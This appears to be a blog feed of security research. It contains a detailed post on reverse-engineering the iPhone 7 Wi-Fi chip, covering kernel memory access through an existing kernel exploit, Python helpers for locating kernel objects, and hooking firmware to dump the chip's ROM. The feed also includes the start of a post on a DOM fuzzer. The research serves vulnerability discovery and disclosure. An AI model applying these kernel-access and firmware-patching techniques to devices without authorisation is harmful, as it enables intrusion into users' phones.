First, Apple does not provide a “developer-mode” iPhone, nor is there a mechanism to selectively bypass the security model. This means that in order to meaningfully explore the system, researchers are forced to subvert the device’s security model (i.e., by jailbreaking). Consequently, exploring different components within the device is made much more difficult.
Additionally, unlike the Android ecosystem, Apple has chosen to develop their entire host-side stack “from scratch”. Most importantly, the iOS drivers used to interact with Broadcom’s chip are written by Apple, and are not based on Broadcom’s FullMAC drivers (bcmdhd or brcmfmac). Other host-side utilities, such as Broadcom’s debugging toolchain, are thus also not included.
That said, Apple did develop their own mechanisms for accessing and debugging the chip. These capabilities are exposed via a set of privileged ioctls embedded in the IO80211Family driver. While the interface itself is undocumented, reverse-engineering the corresponding components in both the IO80211Family and AppleBCMWLANCore drivers reveals a rather powerful command channel, and one which could possibly be used for the purposes of our research. Unfortunately, access to this interface requires additional entitlements, thus preventing us from leveraging it (unless we escalate our privileges).
Lastly, there’s no overlap between the revisions of Wi-Fi chips used on Apple’s devices and those used in the Android ecosystem. As we’ll see later on, this might be due to the fact that Apple-specific Wi-Fi chips contain Apple-specific features. Regardless, perhaps unsurprisingly, none of the corresponding data sheets for these SoCs have been made available.

So… it appears we’ll have to deal with a proprietary chip, on a proprietary device running a proprietary operating system. We have our work cut out for us! That said, it’s not all doom and gloom; instead of relying on all of the above, we’ll just need to create our own independent research platform.
Acquiring the ROM?
Let’s start by analysing the SoC’s firmware and loading it up into a disassembler. As we’ve seen in the previous round of research, the Wi-Fi firmware consists of a small chunk of ROM containing most of the firmware’s data and code, and a larger blob of RAM housing all of the runtime data structures (such as the heap and stack), as well as patches to the ROM’s code.
Since the RAM blob is loaded into the Wi-Fi chip during its initialisation by the host, it should be accessible via the host’s root filesystem. Indeed, after downloading the iPhone’s firmware image, extracting the root filesystem and searching for indicative strings, we are greeted with the following result:

Great, so we’ve identified the firmware’s RAM. What’s more, it appears that the Wi-Fi chip embedded in the phone is a BCM4355C0, a model which I haven’t come across in Android devices in the past (also, it curiously does not appear on Broadcom’s website).
Regardless, having the RAM image is all well and good, but what about the ROM? After all, the majority of the code is stored in the chip’s ROM. Even if we were to settle for analysing the RAM alone, it’d be extremely difficult to reverse-engineer independently of the ROM as many of the functions in the former address data stored in the latter. Without knowing the ROM’s contents, or even its rudimentary layout, we’ll have to resort to guesswork.
However, this is where we run into a bit of a snag! To extract the ROM we’ll need to interact with the Wi-Fi chip itself... Whereas on Android we could simply use a “rooted” build to gain elevated privileges, and then access the Wi-Fi SoC via Broadcom’s debugging utilities, there are no comparable mechanisms on the iPhone. In that case, how will we interact with the chip and ultimately extract its ROM?
We could opt for a hardware-based research environment. Reviewing the data sheets for one of Broadcom’s Wi-Fi SoCs, BCM4339, reveals several interfaces through which the chip may be debugged, including UART and a JTAG interface.

That said, there are several disadvantages to this approach. First, we’d need to open up the device, locate the required interfaces, and make sure that we do not damage the phone in the process. Moreover, requiring such a setup for each research device would cause us to incur significant start-up overhead. Perhaps most importantly, relying on a hardware-based approach would limit the number of researchers who’d be willing to utilise our research platform -- both because hardware is a relatively specialised skill-set, and since people might (rightly) be wary of causing damage to their own devices.
So what about a completely software-based solution? After all, on Android devices we were able to access the chip’s memory solely using software. Perhaps a similar solution would apply to Apple devices?
To answer this question, let’s trace our way through the Android components involved in the control flow for accessing the Wi-Fi chip’s memory from the host. The flow begins with a user issuing a memory access command via Broadcom’s debugging utility (“membytes”). This, in turn, triggers an ioctl to Broadcom’s driver, requesting the memory access operation. After some processing within the driver, it performs the requested action by directly accessing the chip’s tightly-coupled memory (TCM) from the kernel’s Virtual Address-Space (VAS).

Two Registers Walk Into a BAR
As we’re mostly interested in the latter part, let’s disregard the Android-specific components for now and focus on the mechanism in bcmdhd allowing TCM access from the host.
Reviewing the driver’s code allows us to arrive at the relevant code flow. First, the driver enables the PCIe-connected Wi-Fi chip. Then, it accesses the PCIe Configuration Space to program the Wi-Fi chip’s Base Address Registers (BARs). In keeping with the PCI standards, programming the BARs and mapping them into the host’s address space exposes functionality directly from the Wi-Fi SoC to the host, such as IO-Space or Memory Space access. Taking a closer look at Broadcom’s chips, they seem to provide two BARs in their configuration space: BAR0 and BAR1.
BAR0 is used to map-in registers corresponding to the different cores on the Wi-Fi SoC, including the ARM processor running the firmware’s logic, and more esoteric components such as the PCIe Gen 2 core on the Wi-Fi SoC. The cores themselves can be selected by accessing the PCIe configuration space once again, and programming the “BAR0 Window” register, directing it at the backplane address corresponding to the requested core.
BAR1, on the other hand, is used solely to map the Wi-Fi chip’s TCM into the host. Since Broadcom’s driver leverages the TCM access capability extensively, it maps-in BAR1 into the kernel’s virtual address space during the device’s initialisation, and doesn’t unmap it until the device shuts down. Once the TCM is mapped into the kernel, all subsequent memory accesses to the chip’s TCM are performed by simply modifying the mapped block within the kernel’s VAS. Any write operations made to the memory-mapped block are automatically reflected to the Wi-Fi chip’s RAM.
This is all well and good, but what about iOS? Since Apple develops their own drivers for interacting with Broadcom’s chips, what holds true in Broadcom’s drivers doesn’t necessarily apply to Apple’s drivers. After all, we could think of many different approaches to accessing the chip’s memory. For example, instead of mapping the entire TCM into the kernel’s memory, they might elect to only map-in certain regions of the TCM, to map it only on-demand, or even to rely on different chip-access mechanisms altogether.
To get to the bottom of this, we’ll need to start reverse-engineering Apple’s drivers. This can be done by extracting the kernelcache from the iPhone’s firmware and loading it into our favourite disassembler. After loading the kernel, we immediately come across two driver KEXTs related to Broadcom’s Wi-Fi chip; AppleBCMWLANCore and AppleBCMWLANBusInterfacePCIe.
Spending some time reverse-engineering the two drivers, it’s quickly evident what their corresponding roles are. AppleBCMWLANCore serves as a high-level driver, dealing mostly with configuring the Wi-Fi chip, handling incoming events, and chip-specific features such as offloading. In keeping with good design practices, the driver is unaware of the interface through which the chip is connected, allowing it to focus solely on the logic required to interact with the chip. In contrast, AppleBCMWLANBusInterfacePCIe, serves a complementary role; it is a low-level driver tasked with handling all the PCIe related communication protocols, dealing with MSI interrupts, and generally everything interface-related.
We’ll revisit the two drivers more in-depth later on, but for now it’s sufficient to say that we have a relatively good idea where to start looking for a potential TCM mapping -- after all, as we’ve seen, the TCM access is performed by mapping the PCIe BARs. Therefore, it would stand to reason that such an operation would be performed by AppleBCMWLANBusInterfacePCIe.
After reverse-engineering much of the driver, we come across a group of suspicious-looking functions that appear like candidates for TCM accessors. All the above functions serve the same purpose -- accessing a memory-mapped buffer, differing from one another only in the size of the word used (16, 32, or 64-bit). Anecdotally, the corresponding APIs for TCM access in the Android driver follow the same structure. What’s more, the above functions all reference the string “Memory”... We might be onto something!
Kernel Function 0xFFFFFFF006D1D9F0
Cross-referencing our way up the call-chain, it appears that all of the above functions are methods pertaining to instances of a single class, which incidentally bears the same name as that of the driver: AppleBCMWLANBusInterfacePCIe. Since several functions in the call-chain are virtual functions, we can locate the class’s VTable by searching for 64-bit words containing their addresses within the kernelcache.

To avoid unnecessary confusion between the object above and the driver, we’ll refer to the object from now on as the “PCIe object”, and we’ll refer to the driver by its full name: “AppleBCMWLANBusInterfacePCIe”.
Kernel Memory Analysis Framework
Now that we’ve identified mechanisms in the kernel possibly relating to the Wi-Fi chip’s TCM, our next course of action is to somehow access them. Had we been able to debug the iOS kernel, we could have simply placed a breakpoint on the aforementioned memory access functions, recorded the location of the shared buffer, and then used our debugger to freely access the buffer on our own. However, as it happens, iOS offers no such debugger. Indeed, having such a debugger would allow users to subvert the device’s security model...
Instead, we’ll have to create our own kernel debugger!
Debuggers usually consist of two main pieces of functionality:
  1. The ability to modify the control flow of the program (e.g., by inserting breakpoints)
  2. The ability to inspect (and modify) the data being processed by the program

As it happens, modifying the kernel’s control flow on modern Apple devices (such as the iPhone 7) is far from trivial. These devices include a dedicated hardware component -- Apple’s Memory Cache Controller (AMCC), designed to prevent attackers from modifying the kernel’s code, even in the presence of full control over the kernel itself (i.e., EL1 code execution). While AMCC might make for an interesting research target in its own right, it’s not the main focus of our research at this time. Instead, we’ll have to make do with analysing and modifying the data processed by the kernel.
To gain access to the kernel, we’ll first need to exploit a privilege escalation vulnerability. Luckily, we can forgo all of the complexity involved in developing a functional kernel exploit, and instead rely on some excellent work by Ian Beer.
Earlier this year, Ian developed a fully-functional exploit allowing kernel code execution from any sandboxed process on the system. Upon successful execution, Ian’s exploit provides two primitives - memory-read and memory-write - allowing us to freely explore the kernel’s virtual address-space. Since the exploit was developed against iOS 10.2, we’ll need to use the same version on our target iPhone to utilise it.
To allow for increased flexibility, we’ll aim to design our research platform to be modular; instead of tying the platform to a specific memory access mechanism, we’ll use Ian’s exploit as a “black-box”, only deferring memory accesses to the exploit’s primitives.
Moreover, it’s important that whatever system we build allows us to explore the device comfortably. Thinking about this for a moment, we can boil it down to a few basic requirements:
  1. The analysis should be done on a developer-friendly machine, not on the iPhone
  2. The platform should be scriptable and easily extensible
  3. The platform should be independent of the memory access mechanism used

To prevent any dependence on the memory access mechanism, we’ll implement a rudimentary command protocol, allowing clients to perform read or write operations, as well as offering an “execute” primitive for gadgets within the kernel’s VAS. Next, we’ll insert a small stub implementing this protocol into the exploit, allowing us to interface with the exploit as if it were a “black box”. As for the client, it can be executed on any machine, as long as it’s able to connect to the server stub and communicate using the above protocol.
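To make the idea a little more concrete, here is a minimal sketch of how such a command protocol could be framed on the client side. The opcodes, the header layout and the function names are all invented for this illustration; they are assumptions, not the wire format used by the actual server stub.

```python
import struct

# Hypothetical opcodes; the real stub's wire format is not described in this post.
CMD_READ, CMD_WRITE, CMD_EXEC = 0, 1, 2

# Assumed header: 1-byte opcode, 8-byte kernel address, 4-byte length (little-endian).
# The length is the number of bytes to read, or the size of the payload that follows.
HEADER = struct.Struct("<BQI")


def encode_read(addr, length):
    """Request `length` bytes starting at kernel address `addr`."""
    return HEADER.pack(CMD_READ, addr, length)


def encode_write(addr, data):
    """Request that `data` be written at kernel address `addr`."""
    return HEADER.pack(CMD_WRITE, addr, len(data)) + data


def encode_exec(addr, args=()):
    """Request execution of the gadget at `addr` with 64-bit arguments."""
    payload = b"".join(struct.pack("<Q", arg) for arg in args)
    return HEADER.pack(CMD_EXEC, addr, len(payload)) + payload


def decode(message):
    """Split a request into (opcode, address, length, payload)."""
    opcode, addr, length = HEADER.unpack_from(message)
    return opcode, addr, length, message[HEADER.size:]
```

Keeping the framing this small means the server stub only has to dispatch on a single byte, so swapping the underlying exploit for a different memory access mechanism would leave the client untouched.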
A version of Ian Beer’s extra_recipe exploit with the aforementioned server stub can be found on our bug tracker, here.
Lastly, there’s the question of the research platform itself. For convenience’s sake, we’ve decided to develop the framework as a set of Python scripts, not unlike forensics frameworks such as Volatility. We’ll slowly grow the framework as we go along, adding scripts for each new data structure we come across.
Since the iOS kernel relies heavily on dynamic dispatch, the ability to explore the kernel in a shell-like interface allows us to easily resolve virtual call targets by inspecting the virtual pointers in the corresponding objects. We’ll use this ability extensively to assist our static analysis in places where the code is hard to untangle.
Over the course of our research we’ll develop several modules for the analysis framework, allowing interaction with objects within the XNU kernel, parts of IOKit, hardware components, and finally the Wi-Fi chip itself.
Setting Up a Test Network
Moving on, we’ll need to create a segregated test network, consisting of the target iPhone, a single MacBook (which we’ll use to interact with the iPhone), and a Wi-Fi router.
As our memory analysis framework transmits data over the network, both the iPhone and the MacBook must be able to communicate with one another. Additionally, as we’re using Xcode to deploy the exploit from the MacBook to the iPhone, it’d be advantageous if the test network allowed both devices to access the internet (so the developer profile could be verified).
Lastly, we require complete control over all aspects of our Wi-Fi router. This is since the next part of our research will deal extensively with the Wi-Fi layer. As such we’d like to reserve the ability to inject, modify and drop frames within our network -- primitives which may come in handy later on.
Putting the above requirements together, we arrive at the following basic topology:

In my own lab setup, the role of the Wi-Fi router is fulfilled by my ThinkPad laptop, running Ubuntu 16.04. I’ve connected two SoftMAC TL-WN722N dongles, one for each interface (internal and external). The internal network’s access-point is broadcast using hostapd, and the external interface connects to the internet using wpa_supplicant. Moreover, network-manager is disabled to prevent interference with our configuration.
Note that it’s imperative that the dongle used to broadcast the internal network’s access-point is a SoftMAC device (and not FullMAC) -- this will ensure that the MLME and MAC layers are processed by the host’s software (i.e., by the Linux Kernel and hostapd), allowing us to easily control the data transmitted over those layers.
The laptop is also minimally configured to perform IP forwarding and to serve as a NAT, in order to allow connections from the internal network out into the internet. In addition, I’ve set up both DNS and DHCP servers, to prevent the need for any manual configuration. I also recommend setting up DNS forwarding and blocking Apple’s software-update domains within your network.
Depending on your work environment, it may be the case that many (or most) Wi-Fi channels are rather crowded, thereby reducing the signal quality substantially. While dropping frames doesn’t normally affect our ability to use the network (frames would simply be re-transmitted), it may certainly cause undesirable effects when attempting to run an over-the-air exploit (as re-transmissions may alter the firmware’s state substantially).
Anecdotally, scanning for nearby networks around my desk revealed around 60 Wi-Fi networks, causing quite a bit of noise (and frame loss). If you encounter the same issue, you can boost your RSSI by building a small cantenna and connecting it to your dongle:

Finding the TCM
Using our test network and memory analysis platform, let’s start exploring the kernel’s VAS!
We’ll begin the hunt by searching for the PCIe object within the kernel. After all, we know that finding the object will allow us to locate the suspect TCM mapping, bringing us closer to our goal of developing a Wi-Fi firmware debugger. Since we’re unable to place breakpoints, we’ll need to locate a “path” leading from a known memory location to that of the PCIe object.
So how will we identify the PCIe object once we come across it? Well, while the C++ standards do not explicitly specify how dynamic dispatch is implemented, most compilers tend to use the same ABI for this purpose -- the first word of every object containing virtual functions serves as a pointer to that object’s virtual table (commonly referred to as the “virtual pointer” or “vptr”). By leveraging this little tidbit, we can build our own object identification mechanism; simply read the first word of each object we come across, and check which virtual table it corresponds to. Since we’ve already located the VTable corresponding to the PCIe object we’re after, all we’d need to do is check each object against that address.
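As a minimal sketch of this check, assuming a `read_mem(addr, size)` primitive that returns raw bytes (a hypothetical name standing in for whatever the memory access stub provides), the identification step boils down to a single comparison. Note that under the Itanium C++ ABI the stored vptr usually points at the first function slot rather than at the very start of the virtual table structure, so `expected_vptr` should be the value actually stored in live objects.

```python
import struct


def read_u64(read_mem, addr):
    """Read one little-endian 64-bit word using the supplied read primitive."""
    return struct.unpack("<Q", read_mem(addr, 8))[0]


def has_vtable(read_mem, obj_addr, expected_vptr):
    """Return True if the object's first word equals the expected vptr value."""
    return read_u64(read_mem, obj_addr) == expected_vptr


def make_reader(base, blob):
    """Build a fake read primitive over a byte string, for offline experiments."""
    def read_mem(addr, size):
        off = addr - base
        if off < 0 or off + size > len(blob):
            raise ValueError("unmapped address 0x%x" % addr)
        return blob[off:off + size]
    return read_mem
```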
Now that we know how to identify the object, we can begin searching for it within the kernel. But where should we start? After all, the object could be anywhere in the kernel’s VAS. Perhaps we can gain some more information by taking a look at the object’s constructor. For starters, doing so will allow us to find out which allocator is used to create the object; if we’re lucky, the object may be allocated from a special pool or stored in a static location.
Kernel Function 0xFFFFFFF006D34734
(OSObject’s “new” operator is a wrapper around kalloc - the XNU kernel allocator).
Looking at the code above, it appears that the PCIe object is not allocated from a special pool. Perhaps, instead, the object is addressable through data stored in the driver’s BSS or data segments? If so, then by following every “chain” of pointers originating in the above segments, we should be able to locate a chain terminating at our desired object.
To test out this hypothesis, let’s write a short Python script to perform a depth-first search for the object, starting in the driver’s BSS and data segments. The script simply iterates over each 64-bit word and checks whether it appears to be a valid kernel virtual address. If so, it recursively continues the search by following the pointer and its neighbouring pointers (searching both forwards and backwards), stopping only when the maximal search depth is reached (or the object is located).
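The search described above could be sketched roughly as follows. This is not the script used in the research: the lower bound for kernel pointers, the size of the neighbour window and the `read_mem` contract (raising `ValueError` for unmapped addresses) are all assumptions made for the sake of the example.

```python
import struct

KERNEL_MIN = 0xFFFFFFF000000000  # assumed lower bound for kernel virtual addresses


def read_u64(read_mem, addr):
    """Read a 64-bit word, returning None if the address cannot be read."""
    try:
        return struct.unpack("<Q", read_mem(addr, 8))[0]
    except (ValueError, struct.error):
        return None


def looks_like_kernel_pointer(value):
    return value is not None and value >= KERNEL_MIN and value % 8 == 0


def find_chain(read_mem, start, size, target_vptr, max_depth=10, window=4):
    """Depth-first search from [start, start + size) for an object whose first
    word is target_vptr. Returns the list of addresses visited along the chain,
    ending with the object's address, or None if nothing was found."""
    visited = set()  # avoids cycles; may prune a shorter path to a seen address

    def visit(addr, depth, path):
        if addr in visited:
            return None
        visited.add(addr)
        word = read_u64(read_mem, addr)
        if word is None:
            return None
        if word == target_vptr:
            return path + [addr]
        if depth >= max_depth or not looks_like_kernel_pointer(word):
            return None
        # Follow the pointer and its neighbours, both backwards and forwards.
        for i in range(-window, window + 1):
            found = visit(word + 8 * i, depth + 1, path + [addr])
            if found:
                return found
        return None

    for off in range(0, size, 8):
        found = visit(start + off, 0, [])
        if found:
            return found
    return None
```

The `visited` set keeps the search from looping forever on cyclic structures, at the cost of occasionally missing a shorter route to an address that was first reached near the depth limit.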

After running the DFS and following pointers up to 10 levels deep, we find no matching chain. It appears that none of the objects in the BSS or data segments contain a (sufficiently short) pointer chain leading to our target object.
So how should we proceed? Let’s take a moment to consider what we know about the object so far. First, the object is allocated using the XNU kernel allocator, kalloc. We also know the exact size of the allocation (3824 bytes). And, of course, we have a means of identifying the object once located. Perhaps we could inspect the allocator itself to locate the object...
On the one hand, it’s entirely possible that kalloc doesn’t keep track of in-use allocations. If so, tracking down our object would be rather difficult. On the other hand, if kalloc does have a way of identifying past allocations, we can parse its data structures and follow the same logic to identify our object. To get to the bottom of this, let’s download the XNU source code corresponding to this version of iOS, and read through kalloc’s implementation.
After spending some time familiarising ourselves with kalloc’s implementation, we can sketch a high-level view of the allocator’s implementation. Since kalloc is a “zone allocator”, each allocated object is assigned a region from which it is drawn. Individual regions are represented by the zone_t structure, which holds all of the metadata pertaining to the zone.
The allocator’s operation can be roughly split into two phases: identifying the corresponding zone for each allocation, and carving the allocation from the zone. The identification process itself takes on three distinct flows, depending on the size of the requested allocation. Once the target zone is identified, the allocation process proceeds identically for all three flows.
So how are the allocations themselves performed? During zones’ lifetimes, they must keep track of their internal metadata, including the zone’s size, the number of stored elements and many other bits and pieces. More importantly, however, the zone must track the state of the memory pages assigned to it. During the kernel’s lifetime, many objects are allocated and subsequently freed, causing the different zones’ pages to fill up or vacate. If each allocation triggered an iteration over all possible pages while searching for vacancies, kalloc would be quite inefficient. Instead, this is tackled by keeping track of several queues, each denoting the state of the memory pages assigned to the zone.
Among the queues stored in each zone are two queues of particular interest to us:
  • The “intermediate” queue - contains pages with both vacancies and allocated objects.
  • The “all used” queue - contains pages with no vacancies (only filled with objects).

Putting it all together, we can identify allocated objects in kalloc by simply following the same mechanisms as those used by the allocator to locate the target zone. Once we find the matching zone, we’ll parse its queues to locate each allocation made within the zone, stopping only when we reach our target object.
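A simplified sketch of the queue-walking step might look like the code below. It relies on XNU queues being circular, doubly-linked lists whose entries begin with a `next` pointer; everything else is an assumption for illustration. In particular, the translation from a page metadata entry to the page it describes differs between XNU versions, so it is passed in as a hypothetical `meta_to_page` callable, and `chunk_size` stands for however many bytes each queue entry covers.

```python
import struct


def read_u64(read_mem, addr):
    """Read one little-endian 64-bit word using the supplied read primitive."""
    return struct.unpack("<Q", read_mem(addr, 8))[0]


def walk_queue(read_mem, head_addr, max_entries=4096):
    """Yield the address of each entry on a circular queue headed at head_addr."""
    entry = read_u64(read_mem, head_addr)
    seen = 0
    # Stop when we wrap around to the head, hit a null link, or exceed the cap.
    while entry not in (0, head_addr) and seen < max_entries:
        yield entry
        entry = read_u64(read_mem, entry)
        seen += 1


def find_object(read_mem, queue_heads, elem_size, chunk_size,
                meta_to_page, target_vptr):
    """Scan every element slot reachable from the given queues and return the
    address of the first one whose first word equals target_vptr."""
    for head in queue_heads:
        for meta in walk_queue(read_mem, head):
            page = meta_to_page(meta)
            for off in range(0, chunk_size - elem_size + 1, elem_size):
                if read_u64(read_mem, page + off) == target_vptr:
                    return page + off
    return None
```

Passing both the “intermediate” and “all used” queue heads as `queue_heads` covers every page that can currently hold a live allocation.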

Finally, we can package all of the above into a module in our analysis framework. The module allows us to either manually iterate over zones’ queues, or to locate objects by their virtual table (optionally accepting the allocation size to quickly locate the relevant zone).
Using our new kalloc module, we can search for the PCIe object using the VTable address we found earlier on. After doing so, we are finally greeted with a positive result -- the object is successfully located within the kernel’s VAS! Next, we’ll simply follow the same steps we identified in the memory accessors analysed earlier on, in order to extract the location of the suspected TCM mapping within the kernel.
Since the TCM mapping provides a view into the Wi-Fi chip’s RAM, we’d naturally expect it to begin with the same values as those we had identified in the RAM file extracted from the firmware. Let’s try and read out some of the values from the buffer and see whether it matches the RAM dump:
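A comparison of this kind can be sketched with two small helpers, assuming we have already read some bytes out of the suspected mapping and loaded the RAM file from the root filesystem. The function names are made up for this example. Since runtime data diverges from the on-disk image once the firmware is running, only a short prefix is compared by default.

```python
def first_mismatch(tcm_bytes, ram_image, length=64):
    """Return the offset of the first differing byte within the compared
    prefix, or None if the prefixes are identical."""
    limit = min(length, len(tcm_bytes), len(ram_image))
    for off in range(limit):
        if tcm_bytes[off] != ram_image[off]:
            return off
    return None


def hexdump(data, base=0, width=16):
    """Format bytes as rows of hex values, each prefixed with its address."""
    lines = []
    for off in range(0, len(data), width):
        row = data[off:off + width]
        lines.append("%08x  %s" % (base + off, " ".join("%02x" % b for b in row)))
    return "\n".join(lines)
```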

Great! So we’ve finally found the TCM. This brings us one step closer to acquiring the ROM, and to building a research environment for the Wi-Fi SoC.
Acquiring the ROM
The TCM mapping provides a view into the Wi-Fi chip’s RAM. While accessing the RAM is undoubtedly useful (as it allows us to gain visibility into the runtime structures used by the chip, such as the heap’s state), it does not allow us to directly access the chip’s ROM. So why did we go to all of this effort to begin with? Well, while thus far we have only used the mapped TCM buffer to read the Wi-Fi SoC’s RAM, recall that the same mapping also allows us to freely write to it -- any data written to the memory-mapped buffer is automatically reflected back to the Wi-Fi SoC’s RAM.
Therefore, we can leverage our newly acquired write access to the chip’s RAM in order to modify the chip’s behaviour. Perhaps most importantly, we can insert hooks into RAM-resident functions in the firmware, and direct their flow towards our own code chunks. As we’ve already built a patching infrastructure in the previous blog posts, we can incorporate the same code as a module in our analysis framework!
Doing so allows us to provide a convenient interface through which we simply select a target RAM function and provide a corresponding assembly stub, and the framework then proceeds to patch the function on our behalf, direct it into our shellcode to execute our hook (and emulate the original prologue), and finally return back to the original function. The shellcode stub itself is written into the top of the heap’s largest free chunk, allowing us to avoid overwriting any important data structures in the RAM.

Building on this technique, let’s insert a hook into a commonly invoked RAM function (such as the chip’s “ioctl” handler). Once invoked, our hook will simply copy small “windows” of the ROM into predetermined regions in RAM. Note that since the RAM is only slightly larger than the ROM, we cannot leak the entire ROM in one go, so we’ll have to resort to this iterative approach instead. Once a ROM chunk is copied, our shellcode stub signals completion, causing the host to subsequently extract the leaked ROM contents and notify the stub that the next chunk of ROM may be leaked.
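The host side of this handshake can be illustrated with a small simulation. The `FakeChip` class below merely stands in for the patched firmware so that the loop can be run offline; its staging buffer, `ready` flag and method names are assumptions made for the example, not the layout used by the real shellcode stub.

```python
class FakeChip:
    """Stand-in for the patched firmware: copies ROM windows into RAM."""

    def __init__(self, rom, window_size):
        self.rom = rom
        self.staging = bytearray(window_size)  # region of RAM reserved for leaks
        self.ready = False                     # completion flag set by the hook

    def run_hook(self, offset, size):
        # What the shellcode stub would do once the hooked function is invoked.
        self.staging[:size] = self.rom[offset:offset + size]
        self.ready = True


def leak_window(chip, offset, size):
    """Ask for one ROM window and read it back out of the staging buffer."""
    chip.ready = False
    chip.run_hook(offset, size)  # on a device: trigger the hooked RAM function
    if not chip.ready:
        raise RuntimeError("hook did not signal completion")
    return bytes(chip.staging[:size])


def dump_rom(chip, rom_size, window_size):
    """Collect the whole ROM one window at a time."""
    rom = bytearray()
    for offset in range(0, rom_size, window_size):
        size = min(window_size, rom_size - offset)
        rom += leak_window(chip, offset, size)
    return bytes(rom)
```

On real hardware both the staging buffer and the completion flag would be read and written through the TCM mapping, with the host polling the flag between windows.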

Indeed, after inserting the hook and running the scheme detailed above, we are finally presented with a complete copy of the chip’s ROM. Now we can finally move on to analysing the firmware image!
To properly load the firmware into a disassembler, we’ll need to locate the ROM and RAM’s loading addresses, as well as their respective sizes. As we’ve seen in the past, the chip’s ROM is mapped at address zero and spans several KBs. The RAM, on the other hand, is normally mapped at a fixed, higher address.
There are multiple ways in which the RAM’s loading address can be deduced. First, the RAM blob analysed previously embeds its own loading address at a fixed offset. We can verify the address’s validity by attempting to load the RAM at this offset in a disassembler and observing that all the branches resolve correctly. Alternately, we can extract the loading address from the PCIe object we identified earlier in the kernel, as it contains both attributes as fields in the object.
Regardless, all of the above methods yield the same result -- the RAM is loaded at address 0x160000, and is 0xE0000 bytes long:
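For scripting purposes, the resulting layout can be captured in a couple of constants. The helper below is a small sketch (its name is our own) that translates a firmware address into an offset within the RAM image, using only the load address and size given above.

```python
RAM_BASE = 0x160000
RAM_SIZE = 0xE0000
RAM_END = RAM_BASE + RAM_SIZE  # first address past the RAM, i.e. 0x240000


def ram_offset(addr):
    """Translate a firmware address into an offset within the RAM image."""
    if not RAM_BASE <= addr < RAM_END:
        raise ValueError("address 0x%x is outside the RAM" % addr)
    return addr - RAM_BASE
```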

Building a Wi-Fi Firmware Debugger
Having extracted the ROM and achieved TCM access capabilities, we can also build a module to allow us to easily interact with the Wi-Fi chip. This module will act as a debugger of sorts for the Wi-Fi firmware, allowing us to gain full read/write capabilities to the Wi-Fi firmware, as well as providing several key debugging features.
Among the features present in our debugger are the abilities to inspect the heap’s freelist, execute assembly code chunks directly on the firmware, and even hook RAM-resident functions.
In the next blog post we’ll continue expanding the functionality provided by this module as we go along, resulting in a more complete research framework.
Wrapping Up
In this blog post we’ve performed our initial investigation into the Wi-Fi stack on Apple’s mobile devices. Using a privileged research platform to poke around the kernel, we managed to locate the Wi-Fi firmware’s TCM mapping in the host, and to extract the Wi-Fi chip’s ROM for further analysis. We also started fleshing out our research platform within the iOS kernel, allowing us to build our very own Wi-Fi firmware debugger, as well as several modules for parsing the kernel’s structures -- useful tools for the next stage of our research!
In the next blog post, we’ll use our firmware debugger in order to continue our exploration of the Wi-Fi chip present on the iPhone 7. We’ll perform a deep dive into the firmware, discover multiple vulnerabilities and develop an over-the-air exploit for one of them, allowing us to gain full control over the Wi-Fi SoC.

The Great DOM Fuzz-off of 2017

Google Project Zero - Thu, 09/21/2017 - 12:35
Posted by Ivan Fratric, Project Zero
Introduction
Historically, DOM engines have been one of the largest sources of web browser bugs. And while in the recent years the popularity of those kinds of bugs in targeted attacks has somewhat fallen in favor of Flash (which allows for cross-browser exploits) and JavaScript engine bugs (which often result in very powerful exploitation primitives), they are far from gone. For example, CVE-2016-9079 (a bug that was used in November 2016 against Tor Browser users) was a bug in Firefox’s DOM implementation, specifically the part that handles SVG elements in a web page. It is also a rare case that a vendor will publish a security update that doesn’t contain fixes for at least several DOM engine bugs.
An interesting property of many of those bugs is that they are more or less easy to find by fuzzing. This is why a lot of security researchers as well as browser vendors who care about security invest into building DOM fuzzers and associated infrastructure.
As a result, after joining Project Zero, one of my first projects was to test the current state of resilience of major web browsers against DOM fuzzing.
The fuzzer
For this project I wanted to write a new fuzzer which takes some of the ideas from my previous DOM fuzzing projects, but also improves on them and implements new features. Starting from scratch also allowed me to end up with cleaner code that I’m open-sourcing together with this blog post. The goal was not to create anything groundbreaking - as already noted by security researchers, many DOM fuzzers have begun to look like each other over time. Instead the goal was to create a fuzzer that has decent initial coverage, is easily understandable and extendible and can be reused by myself as well as other researchers for fuzzing other targets besides just DOM fuzzing.
We named this new fuzzer Domato (credits to Tavis for suggesting the name). Like most DOM fuzzers, Domato is generative, meaning that the fuzzer generates a sample from scratch given a set of grammars that describes HTML/CSS structure as well as various JavaScript objects, properties and functions.
The fuzzer consists of several parts:
  • The base engine that can generate a sample given an input grammar. This part is intentionally fairly generic and can be applied to other problems besides just DOM fuzzing.
  • The main script that parses the arguments and uses the base engine to create samples. Most logic that is DOM specific is captured in this part.
  • A set of grammars for generating HTML, CSS and JavaScript code.
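To illustrate what “generative” means here, the toy below expands a tiny hand-written grammar into a sample. It is not Domato’s engine or grammar format; the grammar, the symbol names and the `generate` function are all invented for this sketch.

```python
import random

# A toy grammar: each symbol maps to a list of alternative productions, and
# each production is a list of tokens. Tokens that are not grammar keys are
# emitted literally.
GRAMMAR = {
    "element": [["<div>", "content", "</div>"], ["<span>", "content", "</span>"]],
    "content": [["text"], ["element"], ["text", "element"]],
    "text": [["foo"], ["bar"]],
}


def generate(symbol, rng, depth=0, max_depth=5):
    """Recursively expand `symbol` into a string using random productions."""
    if symbol not in GRAMMAR:
        return symbol  # literal token
    productions = GRAMMAR[symbol]
    if depth >= max_depth:
        # Past the depth limit, always take the first production; in this
        # grammar those lead to a terminal within a few steps.
        productions = productions[:1]
    production = rng.choice(productions)
    return "".join(generate(tok, rng, depth + 1, max_depth) for tok in production)
```

Calling `generate("element", random.Random(0))` yields a small, well-nested HTML fragment; passing a seeded `random.Random` keeps samples reproducible, which helps when a crash needs to be regenerated.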

One of the most difficult aspects of generation-based fuzzing is creating a grammar or another structure that describes the samples that are going to be created. In the past I experimented with manually created grammars as well as grammars extracted automatically from web browser code. Each of these approaches has advantages and drawbacks, so for this fuzzer I decided to use a hybrid approach:
  1. I initially extracted DOM API declarations from .idl files in Google Chrome Source. Similarly, I parsed Chrome’s layout tests to extract common (and not so common) names and values of various HTML and CSS properties.
  2. Afterwards, this automatically extracted data was heavily manually edited to make the generated samples more likely to trigger interesting behavior. One example of this is functions and properties that take strings as input: Just because a DOM property takes a string as an input does not mean that any string would have a meaning in the context of that property.

Otherwise, Domato supports features that you’d expect from a DOM fuzzer such as:
  • Generating multiple JavaScript functions that can be used as targets for various DOM callbacks and event handlers
  • Implicit (through grammar definitions) support for “interesting” APIs (e.g. the Range API) that have historically been prone to bugs.

